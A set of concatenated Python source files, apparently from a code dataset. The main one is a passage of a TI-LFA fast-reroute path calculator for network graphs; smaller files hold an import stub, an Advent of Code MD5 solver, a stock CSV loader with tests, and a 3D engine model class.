tilfa_graph = self.diagram.label_node_add_nodesid(tilfa_graph)
self.diagram.gen_diagram(
(src + "_" + dst + "_" + path_type),
tilfa_graph,
os.path.join(outdir, src, path_type),
)
def gen_ep_space(self, dst, f_type, graph, src):
"""
Return a list of nodes in src's Extended P-space which avoid resource X
:param str dst: Dst node in "graph" to calculate EP-space not via X
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" to calculate EP-space from
:return ep_space: List of nodes in src's EP-space with respect to X
:rtype: list
"""
"""
TI-LFA Text:
The Extended P-space P'(R,X) of a node R w.r.t. a resource X is the
set of nodes that are reachable from R or a neighbor of R, without
passing through X.
"""
if f_type == "link":
ep_space = self.gen_link_p_space(dst, graph, src)
elif f_type == "node":
ep_space = self.gen_node_p_space(dst, graph, src)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
for nei in graph.neighbors(src):
if nei == dst:
continue
if f_type == "link":
n_p_space = self.gen_link_p_space(dst, graph, nei)
elif f_type == "node":
n_p_space = self.gen_node_p_space(dst, graph, nei)
else:
raise Exception(f"Unrecognised EP-space type {f_type}")
if src in n_p_space:
n_p_space.remove(src)
for ep_node in n_p_space:
"""
Skip EP-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to EP-node:
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
s_ep_paths = self.spf.gen_metric_paths(
dst=ep_node, graph=graph, src=src
)
s_ep_links = [
(path[idx], path[idx + 1])
for path in s_ep_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_ep_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link EP-space node {ep_node} due "
f"to overlap:\n"
f"{s_ep_links},{ep_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
if ep_node not in ep_space:
ep_space.append(ep_node)
return ep_space
def gen_link_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
link(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding S-F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid S-F link to Dst
:return p_space: List of nodes in src's P-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(path[0], path[1]) for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for link protecting P-nodes of {src} not via "
f"link(s): {s_d_fh_links}"
)
p_space = []
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Skip P-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from src to P-node:
"""
s_p_links = [
(path[idx], path[idx + 1])
for path in s_p_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in s_p_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting P-space node {p_node} due "
f"to overlap:\n"
f"{s_p_links},{p_node}\n"
f"{s_d_fh_links},{dst}"
)
continue
p_space.append(p_node)
return p_space
def gen_link_pq_space(self, dst, graph, link_q_space, src):
"""
Return the list of Q-space nodes which are link protecting against S-F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_q_space: List of Q-space nodes in "graph" relative to
D not via S-F
:param str src: Source node name in "graph"
:return link_pq_nodes: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.2. Q-Space property computation for a link S-F, over post-convergence
paths
We want to determine which nodes on the post-convergence path from
the PLR to the destination D are in the Q-Space of destination D
w.r.t. link S-F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of S-F, with Q(D, S-F).
"""
link_pq_space = []
# Get the pre-converge path(s) to D
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
# Remove the pre-convergence first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_d_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in link_q_space: # Q-space doesn't include src or dst
if q_node in post_s_d_path:
link_pq_space.append(q_node)
return link_pq_space
def gen_link_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid link(s) S-F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to S-F link
:return q_space: List of nodes in dst's Q-space with respect to S-F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fh_links = [(src, path[1]) for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
"""
Skip Q-nodes which have the pre-failure first-hop link(s) from src
to dst in the pre-failure path(s) from P-node to dst:
"""
q_d_links = [
(path[idx], path[idx + 1])
for path in q_d_paths
for idx in range(0, len(path) - 1)
]
overlap = [
link for link in q_d_links if link in s_d_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping link protecting Q-space node {q_node} due "
f"to overlap:\n"
f"{q_d_links}\n"
f"{s_d_fh_links}"
)
continue
q_space.append(q_node)
return q_space
def gen_metric_link_tilfas(self, dst, graph, link_ep_space, link_pq_space, link_q_space, src):
"""
Return all link protecting TI-LFAs paths from src to dst.
Do this by returning all equal-cost explicit paths (based on metric,
not hop count) between "src" and "dst" nodes in "graph" that satisfy
the rules below.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list link_ep_space: EP- or P-space of Src node
:param list link_q_space: List of nodes in D's Q-space
:param list link_pq_space: List of nodes in D's Q-Space in post-SPF
:param str src: Source node name in "graph"
:return tilfa_paths: list of dict of TI-LFA paths
:rtype: list
"""
tilfa_paths = []
lfa_cost = 0
lfa_p_cost = 0
"""
TI-LFA Text:
5.1. FRR path using a direct neighbor
When a direct neighbor is in P(S,X) and Q(D,x) and on the post-
convergence path, the outgoing interface is set to that neighbor and
the repair segment list MUST be empty.
This is comparable to a post-convergence LFA FRR repair.
"""
for nei in graph.neighbors(src):
if nei in link_pq_space:
"""
Check that the neighbour/pq-node isn't reached via the same
failed fist hop link(s) toward dst:
"""
pre_s_pq_paths = self.spf.gen_metric_paths(dst=nei, graph=graph, src=src)
pre_s_pq_fh_links = [(src, path[1]) for path in pre_s_pq_paths]
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_links = [(src, path[1]) for path in pre_s_d_paths]
overlap = [
fh_link for fh_link in pre_s_d_fh_links if fh_link in pre_s_pq_fh_links
]
if overlap:
if self.debug > 1:
print(
f"Skipping directly connected neighbour {nei} due "
f"to overlap:\n"
f"{pre_s_pq_fh_links},{nei}\n"
f"{pre_s_d_fh_links},{dst}"
)
continue
if self.debug > 1:
print(
f"Directly connected neighbour {nei} is link "
f"protecting from {src} to {dst}"
)
n_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=nei
)
cost = self.spf.gen_path_cost(graph, [src] + n_d_paths[0])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[[src, nei]],
n_d_paths,
[[]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.1.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
([[src, nei]], [n_d_path for n_d_path in n_d_paths], [[]])
)
if self.debug > 0:
print(f"TI-LFA 5.1.2: {tilfa_paths}")
"""
TI-LFA Text:
5.2. FRR path using a PQ node
When a remote node R is in P(S,X) and Q(D,x) and on the post-
convergence path, the repair list MUST be made of a single node
segment to R and the outgoing interface MUST be set to the outgoing
interface used to reach R.
This is comparable to a post-convergence RLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node not in graph.neighbors(src):
if p_node in link_pq_space:
if self.debug > 1:
print(
f"Remote P-node {p_node} is link protecting from "
f"from {src} to {dst}"
)
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
# Re-calculate the path(s) to D in the failure state (post-convergence)
post_s_p_paths = self.spf.gen_metric_paths(dst=p_node, graph=tmp_g, src=src)
p_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=tmp_g, src=p_node
)
"""
Check if this path has a lower cost from src to dst
than the current TI-LFA path(s)
"""
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0] + p_d_paths[0][1:])
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.1: {tilfa_paths}")
# If it has the same cost...
elif cost == lfa_cost:
"""
Check if this path is the same as an existing TI-LFA,
but using a different repair node along the same path.
Prefer scenario 1 over scenario 2...
Scenario 1: [ src -> R1 ] + [ R2 -> R3 -> dst ]
Scenario 2: [ src -> R1 -> R2 ] + [ R3 -> dst ]
This hopefully reduces the required segment stack and
thus reduces the MTU required and likelihood for
excessive MPLS label push operations.
"""
for tilfa in tilfa_paths:
if tilfa[0][-1] != post_s_p_paths[0][-1]:
cost = self.spf.gen_path_cost(tmp_g, post_s_p_paths[0])
this_lfa = self.spf.gen_path_cost(tmp_g, tilfa[0][0]) ########## Can any of the paths to p_node be different cost?
if cost < this_lfa:
tilfa_paths = [
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
]
if self.debug > 0:
print(f"TI-LFA 5.2.2: {tilfa_paths}")
break
# Else it's an ECMP path with the same cost to p_node
else:
tilfa_paths.append (
(
post_s_p_paths,
p_d_paths,
[graph.nodes[p_node]["node_sid"]]
)
)
if self.debug > 0:
print(f"TI-LFA 5.2.3: {tilfa_paths}")
"""
TI-LFA Text:
5.3. FRR path using a P node and Q node that are adjacent
When a node P is in P(S,X) and a node Q is in Q(D,x) and both are on
the post-convergence path and both are adjacent to each other, the
repair list MUST be made of two segments: A node segment to P (to be
processed first), followed by an adjacency segment from P to Q.
This is comparable to a post-convergence DLFA repair tunnel.
"""
for p_node in graph.nodes:
if p_node == src or p_node == dst:
continue
if p_node in link_ep_space:
if p_node not in link_pq_space:
for q_node in graph.neighbors(p_node):
if q_node == src or q_node == dst:
continue
if q_node in link_q_space:
if self.debug > 1:
print(
f"P-Node {p_node} is neighbour of "
f"{q_node}, which together are link "
f"protecting from {src} to {dst}"
)
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
q_d_paths = self.spf.gen_metric_paths(
dst=dst, graph=graph, src=q_node
)
cost = self.spf.gen_path_cost(
graph, [s_p_paths[0] + q_d_paths[0][1:]]
)
if cost < lfa_cost or lfa_cost == 0:
lfa_cost = cost
tilfa_paths = [
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.3.1: {tilfa_paths}")
elif cost == lfa_cost:
tilfa_paths.append(
(
[s_p_path + [q_node] for s_p_path in s_p_paths],
q_d_paths,
[
graph.nodes[p_node]["node_sid"],
graph.edges[(p_node, q_node)]["adj_sid"]
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.3.2: {tilfa_paths}")
"""
5.4. Connecting distant P and Q nodes along post-convergence paths
In some cases, there is no adjacent P and Q node along the post-
convergence path. However, the PLR can perform additional
computations to compute a list of segments that represent a loop-free
path from P to Q. How these computations are done is out of scope of
this document.
---
Thanks you bastards. We shall calculate any P to Q paths. If some
exist, calculate the Source to P paths, then append them together.
"""
# Get the pre-converge path(s) to D
pre_s_p_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_p_fh_links = [(src, path[1]) for path in pre_s_p_paths]
# Remove the pre-convergence the first-hop link(s) from the graph
tmp_g = graph.copy()
for fh_link in pre_s_p_fh_links:
tmp_g.remove_edge(*fh_link)
"""
For each ep node calculate the post convergence path to each pq node.
Build a list of all these paths to get the lowest cost one.
"""
ep_nodes = [node for node in link_ep_space if node not in link_pq_space]
pq_nodes = [node for node in link_pq_space if node not in link_ep_space]
p_q_paths = []
p_q_cost = 0
for ep in ep_nodes:
for pq in pq_nodes:
post_p_q_paths = self.spf.gen_metric_paths(dst=pq, graph=tmp_g, src=ep)
if len(post_p_q_paths[0]) > 0:
for path in post_p_q_paths:
cost = self.spf.gen_path_cost(tmp_g, path)
if cost < p_q_cost or p_q_cost == 0:
p_q_paths = [path]
p_q_cost = cost
elif cost == p_q_cost:
if path not in p_q_paths:
p_q_paths.append(path)
if p_q_paths:
# If we found p to q paths, append them to s to p paths
s_q_paths = []
for p_q_path in p_q_paths:
p = p_q_path[0]
s_p_paths = self.spf.gen_metric_paths(dst=p, graph=tmp_g, src=src)
for s_p_path in s_p_paths:
s_q_paths.append(s_p_path + p_q_path[1:])
for s_q_path in s_q_paths:
cost = self.spf.gen_path_cost(tmp_g, s_q_path)
if cost < lfa_cost or lfa_cost == 0:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
lfa_cost = cost
tilfa_paths = [
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
]
if self.debug > 0:
print(f"TI-LFA 5.4.1: {tilfa_paths}")
elif cost == lfa_cost:
if self.debug > 1:
print(
f"Remote P & Q nodes in {s_q_path} are link "
f"protecting from {src} to {dst}"
)
q = s_q_path[-1]
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=q)
tilfa_paths.append(
(
[s_q_path],
q_d_paths,
[
self.paths_adj_sids(tmp_g, [s_q_path])
]
)
)
if self.debug > 0:
print(f"TI-LFA 5.4.2: {tilfa_paths}")
return tilfa_paths
def gen_metric_node_tilfas(self, dst, graph, node_ep_space, node_pq_space, src):
"""
Return all node protecting rLFAs.
Do this by filtering the list of link rLFAs "tilfas_link" for those
with pre-convergence best path(s) from all repair tunnel end-points
{p}, which don't pass through any of the first-hops of any of the
pre-convergence best-paths from src to dst.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list tilfas_link: list of link protecting rLFA paths in "graph"
:param str src: Source node name in "graph"
:return tilfas_node: List of tuples of equal-cost node protecting TI-LFAs to dst
:rtype: list
"""
tilfas_node = []
return tilfas_node
def gen_metric_paths(self, dst, graph, src):
"""
Return all TI-LFA paths between the "src" and "dst" nodes in "graph",
based on link metric (not hop count), which provide link and node
protection. Returned are all TI-LFA paths in a dict, keyed by type (link
or node), the key values are lists of tuples containing the path to
the P node and path from P to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node name in "graph"
:return tilfa_paths: Dict with list(s) of tuples
:rtype: list
"""
tilfas = {}
if self.debug > 0:
print(f"Calculating TI-LFA paths from {src} to {dst}")
tilfas = {
"tilfas_link": [],
"tilfas_node": []
}
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
# There are no paths between this src,dst pair
if not s_d_paths:
return tilfas
"""
TI-LFA Text:
5. TI-LFA Repair path
The TI-LFA repair path (RP) consists of an outgoing interface and a
list of segments (repair list (RL)) to insert on the SR header. The
repair list encodes the explicit post-convergence path to the
destination, which avoids the protected resource X and, at the same
time, is guaranteed to be loop-free irrespective of the state of FIBs
along the nodes belonging to the explicit path.
The TI-LFA repair path is found by intersecting P(S,X) and Q(D,X)
with the post-convergence path to D and computing the explicit SR-
based path EP(P, Q) from P to Q when these nodes are not adjacent
along the post convergence path. The TI-LFA repair list is expressed
generally as (Node_SID(P), EP(P, Q)).
"""
if self.ep_space:
link_ep_space = self.gen_ep_space(dst, "link", graph, src)
node_ep_space = self.gen_ep_space(dst, "node", graph, src)
if self.debug > 0:
print(f"link_ep_space: {link_ep_space}")
print(f"node_ep_space: {node_ep_space}")
else:
link_p_space = self.gen_link_p_space(dst, graph, src)
node_p_space = self.gen_node_p_space(dst, graph, src)
if self.debug > 0:
print(f"link_p_space: {link_p_space}")
print(f"node_p_space: {node_p_space}")
link_q_space = self.gen_link_q_space(dst, graph, src)
node_q_space = self.gen_node_q_space(dst, graph, src)
if self.debug > 0:
print(f"link_q_space: {link_q_space}")
print(f"node_q_space: {node_q_space}")
link_pq_space = self.gen_link_pq_space(dst, graph, link_q_space, src)
node_pq_space = self.gen_node_pq_space(dst, graph, node_q_space, src)
if self.debug > 0:
print(f"link_pq_space: {link_pq_space}")
print(f"node_pq_space: {node_pq_space}")
if self.ep_space:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_ep_space, link_pq_space, link_q_space, src)
else:
link_tilfas = self.gen_metric_link_tilfas(dst, graph, link_p_space, link_pq_space, link_q_space, src)
if self.debug > 0:
print(f"link_tilfas: {link_tilfas}")
tilfas["tilfas_link"] = link_tilfas
return tilfas
############################
if self.ep_space:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_ep_space, node_pq_space, src)
else:
node_tilfas = self.gen_metric_node_tilfas(dst, graph, node_p_space, node_pq_space, src)
if self.debug > 0:
print(f"node_tilfas: {node_tilfas}")
tilfas["tilfas_node"] = node_tilfas
return tilfas
def gen_node_p_space(self, dst, graph, src):
"""
Return a list of nodes in src's P-space relevant to the first-hop
nodes(s) towards dst.
:param str dst: Node in "graph" to calculate P-space to, avoiding F
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" which must avoid F node to Dst
:return p_space: List of nodes in src's P-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The P-space P(R,X) of a node R w.r.t. a resource X (e.g. a link S-F,
a node F, or a SRLG) is the set of nodes that are reachable from R
without passing through X. It is the set of nodes that are not
downstream of X in SPT_old(R).
"""
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
if self.debug > 1:
print(
f"Checking for node protecting P-space nodes of {src} not via "
f"first-hop(s): {s_d_fhs}"
)
p_space = []
for p_node in graph.nodes:
# Exclude nodes which are a first-hop towards dst:
if p_node == src or p_node == dst:
continue
if p_node in s_d_fhs:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node} "
f"because it is a first-hop(s) towards {dst}: "
f"{s_d_fhs}"
)
continue
s_p_paths = self.spf.gen_metric_paths(
dst=p_node, graph=graph, src=src
)
"""
Check if any of the p_node->dst path(s) contain any of the
first-hop(s) from src->dst, those are the nodes we want to avoid.
"""
overlap = [
fh for fh in s_d_fhs for s_p_path in s_p_paths if fh in s_p_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting P-space node {p_node}, "
f"path(s) from {src} to {p_node} overlap with "
f"first-hop(s) in path(s) from {src} to {dst}: "
f"{s_p_paths}"
)
continue
p_space.append(p_node)
return p_space
def gen_node_pq_space(self, dst, graph, node_q_space, src):
"""
Return the list of Q-space nodes which are node protecting against F
from S to D.
:param str dst: Destination node name in "graph"
:param networkx.Graph graph: NetworkX graph object
:param list node_q_space: List of Q-space nodes in "graph" relative to
D not via F
:param str src: Source node name in "graph"
:return node_pq_space: List of nodes in D's Q-space and in post-SPF
:rtype: list
"""
"""
TI-LFA Text:
4.4. Q-Space property computation for a node F, over post-convergence
paths
We want to determine which nodes on the post-convergence from the PLR
to the destination D are in the Q-Space of destination D w.r.t. node
F.
This can be found by intersecting the post-convergence path to D,
assuming the failure of F, with Q(D, F).
"""
node_pq_space = []
# Get the pre-converge path(s) to D and remove the first-hop node(s)
pre_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
pre_s_d_fh_nodes = [path[1] for path in pre_s_d_paths]
# There are no node protecting paths for a directly connected neighbour
for fh_node in pre_s_d_fh_nodes:
if fh_node in graph.neighbors(src):
return node_pq_space
tmp_g = graph.copy()
for fh_node in pre_s_d_fh_nodes:
tmp_g.remove_node(fh_node)
# Recalculate the path(s) to D in the failure state (post-convergence)
post_s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=tmp_g, src=src)
for post_s_d_path in post_s_d_paths:
for q_node in node_q_space:
if q_node in post_s_d_path:
node_pq_space.append(q_node)
return node_pq_space
def gen_node_q_space(self, dst, graph, src):
"""
Return a list of nodes in dst's Q-space which avoid node(s) F.
:param str dst: Dest node in "graph" to calculate Q-space for
:param networkx.Graph graph: NetworkX graph object
:param str src: Source node in "graph" relevant to F node
:return q_space: List of nodes in dst's Q-space with respect to F
:rtype: list
"""
"""
TI-LFA Text:
The Q-Space Q(D,X) of a destination node D w.r.t. a resource X is the
set of nodes which do not use X to reach D in the initial state of
the network. In other words, it is the set of nodes which have D in
their P-space w.r.t. S-F, F, or a set of links adjacent to S).
"""
q_space = []
s_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=src)
s_d_fhs = [path[1] for path in s_d_paths]
for q_node in graph.nodes:
if q_node == src or q_node == dst:
continue
q_d_paths = self.spf.gen_metric_paths(dst=dst, graph=graph, src=q_node)
overlap = [
s_d_fh for s_d_fh in s_d_fhs for q_d_path in q_d_paths if s_d_fh in q_d_path
]
if overlap:
if self.debug > 1:
print(
f"Skipping node protecting Q-Space node {q_node}, "
f"path to {dst} overlaps with hop(s) in path(s) from "
f"{src} toward {dst}: {q_d_paths}"
)
continue
q_space.append(q_node)
return q_space
def init_topo(self, graph, topo):
    """
    Create empty dict keys for all possible paths this class can generate

    :param networkx.Graph graph: NetworkX graph object
    :param dict topo: Nested per-(src, dst) topology dict to initialise
    :return None:
    :rtype: None
    """
    node_pairs = (
        (src, dst)
        for src in graph.nodes
        for dst in graph.nodes
        if src != dst
    )
    for src, dst in node_pairs:
        for path_type in self.path_types:
            # setdefault only creates the key when it is absent, matching
            # the original "if path_type not in" guard.
            topo[src][dst].setdefault(path_type, [])
def paths_adj_sids(self, graph, paths):
    """
    Return lists of adj SIDs that will steer along the explicit path

    :param networkx.Graph graph: NetworkX graph object
    :param list paths: List of list of nodes that form the explicit path(s)
    :return adj_sids: List of adj SIDs along path
    :rtype: list of lists
    """
    # For each path, look up the adjacency SID of every consecutive
    # (hop, next-hop) edge; the final node has no outgoing segment.
    adj_sids = [
        [
            graph.edges[(hop, path[idx + 1])]["adj_sid"]
            for idx, hop in enumerate(path[:-1])
        ]
        for path in paths
    ]
    if self.debug > 1:
        print(f"path_adj_sids: {adj_sids}")
    return adj_sids
| 2.8125 | 3 |
fuse/ext/__init__.py | hanslovsky/gunpowder-nodes | 1 | 12766801 | from __future__ import print_function
import logging
import traceback
import sys
logger = logging.getLogger(__name__)
class NoSuchModule(object):
    """Placeholder for a module that failed to import.

    Must be constructed inside an ``except ImportError`` block: it captures
    the in-flight exception (plus its formatted traceback for diagnostics)
    so that any later attribute access re-raises that original error.
    """

    def __init__(self, name):
        self.__name = name
        # Keep the traceback text of the failed import for debugging.
        self.__traceback_str = traceback.format_tb(sys.exc_info()[2])
        exc_type, exc_value = sys.exc_info()[:2]
        self.__exception = exc_type(exc_value)

    def __getattr__(self, item):
        # Any attribute access surfaces the deferred import failure.
        raise self.__exception
# Optional dependency: replace z5py with a lazy-failing stub when it is not
# installed, so importing this package still succeeds and the original
# ImportError only surfaces if z5py is actually used.
try:
    import z5py
except ImportError:
    z5py = NoSuchModule('z5py')
2015/day04/solution.py | loisaidasam/adventofcode | 0 | 12766802 |
import hashlib
import sys
def solve(secret_key, starts_with):
    """Find the smallest positive integer suffix whose MD5 hash matches.

    Appends increasing integers to ``secret_key`` and returns the first
    integer for which the hex MD5 digest of the combined string begins with
    ``starts_with`` (Advent of Code 2015, day 4).

    :param secret_key: puzzle input string
    :param starts_with: required hex-digest prefix, e.g. "00000"
    :return: the first qualifying integer (>= 1)
    """
    result = 1
    while True:
        hash_input = "%s%s" % (secret_key, result)
        # BUG FIX: hashlib.md5 requires bytes on Python 3; .encode() is a
        # no-op-equivalent on Python 2 str, so this works on both.
        hash_result = hashlib.md5(hash_input.encode("utf-8")).hexdigest()
        if hash_result.startswith(starts_with):
            return result
        result += 1
if __name__ == '__main__':
    """
    $ python solution.py yzbqklnj 00000
    First decimal that creates a hash that starts with `00000` based on secret key `yzbqklnj`: 282749
    $ python solution.py yzbqklnj 000000
    First decimal that creates a hash that starts with `000000` based on secret key `yzbqklnj`: 9962624
    """
    # CLI entry point: argv[1] is the secret key, argv[2] the required
    # hex-digest prefix.  NOTE(review): the `print` statement below means
    # this script targets Python 2.
    secret_key = sys.argv[1]
    starts_with = sys.argv[2]
    result = solve(secret_key, starts_with)
    print "First decimal that creates a hash that starts with `%s` based on secret key `%s`: %s" % (
        starts_with,
        secret_key,
        result
    )
| 3.859375 | 4 |
stocks.py | hjwp/datascience-from-scratch | 1 | 12766803 | <filename>stocks.py
import csv
from dataclasses import dataclass
from typing import Any, List, Dict, NamedTuple
NUMBER_COLUMNS = ["Open", "Close", "High", "Low", "Adj Close", "Volume"]
@dataclass(frozen=True)
class Stock:
    """Immutable snapshot of one stock row from the CSV feed."""

    # Ticker symbol, e.g. "AAPL".
    name: str
    # Price at market open.
    opening_price: float
    # Price at market close.
    closing_price: float
def fix_row(raw_row: Dict[str, str]) -> Dict[str, Any]:
    """Return a copy of *raw_row* with numeric columns parsed as floats.

    Columns listed in NUMBER_COLUMNS are converted with float(); all other
    columns keep their original string values.
    """
    return {
        column: (float(value) if column in NUMBER_COLUMNS else value)
        for column, value in raw_row.items()
    }
def load_csv_dicts() -> List[Dict[str, Any]]:
    """Read stocks.csv from the working directory as type-fixed row dicts."""
    with open("stocks.csv") as csv_file:
        reader = csv.DictReader(csv_file.readlines())
        return [fix_row(row) for row in reader]
def load_csv_objects() -> List:
    """Read stocks.csv and return its rows as Stock instances."""
    return [
        Stock(
            name=row["Symbol"],
            opening_price=row["Open"],
            closing_price=row["Close"],
        )
        for row in load_csv_dicts()
    ]
def main():
    """Load the CSV as Stock objects and print the first two rows."""
    # BUG FIX: the original called load_csv(), which does not exist in this
    # module; the available loaders are load_csv_dicts()/load_csv_objects(),
    # so this raised NameError at runtime.
    all_stocks = load_csv_objects()
    print(all_stocks[0])
    print(all_stocks[1])
print(all_stocks[1])
def test_load_csv_dicts_parses_numbers():
    """First CSV row's numeric columns parse to the expected float values."""
    first_row = load_csv_dicts()[0]
    expected = {
        "Open": 0.513393,
        "Close": 0.513393,
        "High": 0.515625,
        "Low": 0.513393,
        "Adj Close": 0.023106,
        "Volume": 117258400,
    }
    for column_name, value in expected.items():
        assert first_row[column_name] == value
    # Every numeric column must already be a number, not a string.
    for column_name in NUMBER_COLUMNS:
        assert first_row[column_name] == float(first_row[column_name])
def test_load_csv_objects_parses_numbers():
    """First row loads as an AAPL Stock with the expected opening price."""
    first_stock = load_csv_objects()[0]
    assert first_stock.name == "AAPL"
    assert first_stock.opening_price == 0.513393
def test_stock():
    """Stock keeps the constructor arguments it was given."""
    sample = Stock("stocky", opening_price=100, closing_price=200)
    assert (sample.name, sample.opening_price, sample.closing_price) == (
        "stocky",
        100,
        200,
    )
if __name__ == "__main__":
print("-" * 80)
main()
| 3.546875 | 4 |
e3d/model_management/ModelInstanceClass.py | jr-garcia/Engendro3D | 8 | 12766804 | from .MaterialClass import Material
# from ..SoundClass import Sound
from ..Base3DObjectClass import Base3DObject
from ..physics_management.physicsModule import bodyShapesEnum
class ModelInstance(Base3DObject):
    """One transformable instance of a previously loaded, shared mesh.

    Returned by Scene.AddModel; wraps per-instance materials, attached
    (monoaural) sounds and the physics body sized from the base model's
    bounding box.
    """

    def __init__(self, baseMats, modelID, engine, ID, animationQuality, position, rotation, uniformScale,
                 shape=bodyShapesEnum.box, mass=None, isDynamic=False):
        """
        This object is returned by Scene.AddModel and represents one transformable instance
        of a non-transformable mesh loaded previously.

        @type animationQuality: int
        @type baseMats: list
        @rtype : ModelInstance
        @param baseMats: List of materials to copy
        @param modelID: ID of this instance for the scene
        @type engine: ManagersReferenceHolder
        """
        mod = engine.models._getModel(modelID)
        if not mod:
            # BUG FIX: the message previously contained a literal '{}'
            # placeholder because .format() was never called on it.
            raise KeyError('Model \'{}\' not found. Try loading it first.'.format(modelID))
        mins, maxs = mod.boundingBox.getBounds()
        # Half-extent per axis derived from the bounding box.
        # NOTE(review): assumes mins/maxs straddle the origin; verify for
        # meshes whose bounds share a sign.
        size = [0, 0, 0]
        size[0] = (abs(maxs[0]) / 2.0) + (abs(mins[0]) / 2.0)
        size[1] = (abs(maxs[1]) / 2.0) + (abs(mins[1]) / 2.0)
        size[2] = (abs(maxs[2]) / 2.0) + (abs(mins[2]) / 2.0)
        offset = mod.boundingBox.center()
